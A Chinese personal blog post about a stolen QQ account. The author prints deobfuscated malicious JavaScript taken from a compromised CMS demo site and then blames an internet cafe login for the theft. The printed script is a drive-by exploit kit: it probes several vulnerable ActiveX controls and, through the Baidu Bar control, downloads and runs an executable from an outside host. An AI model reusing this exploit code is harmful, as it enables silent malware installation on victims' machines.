今天吃完中饭回来,发现QQ被下线,提示密码错误,再尝试登陆,还是错误。。
糟了,密码被盗了。。。
赶快找回,结果被盗号者申请二代密保了,我自己是没申请过的,无法找回。
再去申诉,结果提示正在申诉中。
我靠,如今这盗号者蛮牛的啊,把我的后路都给堵死了。。。
打电话给腾讯,我操她母亲,客服一直是全忙,打了十几个才有人接,我的长途费呀!~~~
被告知要等他的申诉结果出来后我再继续申诉,我靠~~~~~不过还好,下午5点我再去申诉,可以了。。。
目前等待结果中。。。。
————————-
回过头来想想密码什么时候被盗的~
第一反应是前几天在落伍点了风讯的demo站,当时这个站有挂马,但是卡巴斯基没报毒。PS:风讯看来现在真的不行了,连演示站都被别人挂马。。。
然后再回到风讯那个站,现在我当然不敢打开了,本地用PHP来获取网页源代码,最后一行发现iframe和script内容,拿到链接后再提取,解密,再提取,再解密,再提取,再解密…………我也搞不清提取了几次解密了几次,最后获得如下病毒代码,注释是我自己加的。
}else{
try{
var f;
var thunder=new ActiveXObject(“DPClient.Vod”);
}
catch(f){};
finally{
if(f!=”[object Error]“){
document.write(“")
}
}
//迅雷漏洞
try{
var g;
var glworld=new ActiveXObject("GLCHAT.GLChatCtrl.1");
}
catch(g){};
finally{
if(g!="[object Error]"){
document.write("")
}
}
//联众游戏聊天室组件漏洞
try{
var h;
var storm=new ActiveXObject("MPS.StormPlayer.1");
}
catch(h){};
finally{
if(h!="[object Error]"){
document.write("")
}
}
//暴风影音漏洞
try{
var i;
var real=new ActiveXObject("IERPCtl.IERPCtl.1");
}
catch(i){};
finally{
if(i!="[object Error]"){
document.write("") document.write("")
}
}
//real漏洞
try{
var j;
var Baidu=new ActiveXObject("BaiduBar.Tool");
}
catch(j){};
finally{
if(j!="[object Error]"){
Baidu["DloadDS"]("http://c.158dm.com/Baidu.cab", "Baidu.exe", 0)
}
}
//百度bar漏洞
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]" && i=="[object Error]" && j=="[object Error]") {
location.replace("about:blank");
}
}
}
/*Extreme*/
然后就是分析代码了,他所利用的这些漏洞我全部没有啊,然后我还试图下载那个baidu的exe文件,卡巴马上报毒。。。
这是怎么回事???
只有一种可能,不是这个马,我根本没中这个马。也难怪我卡巴全盘杀毒没一个毒。用最近流行的机器狗和磁碟机专杀也没反应。
那会是什么?
也只有一种可能了,上个星期二去学校附近的网吧上网了,在那里登了QQ
但是我输入密码的时候是用QQ自带软键盘的输入的,哎,看来这个安全加密软键盘也不安全。
再来分析盗号的过程。
盗号者在获得我的QQ号码之后,并不急着改密码,因为他也改不了,而是进行申请二代密保,申请需要最多72小时(好像是),申请成功后就可以重新设置密码了,于是我的密码没了;为了防止我申诉回来,他在我之前进行申诉,导致我无法申诉。 真牛你~~~
今天马上给另外一个QQ号码申请了二代密保,不到1个小时就通过了,哎,看来还是要申请二代保安全。。。
还没申请的赶快去申请吧~~~
希望以上内容对你有点帮助~
2 评论
添加评论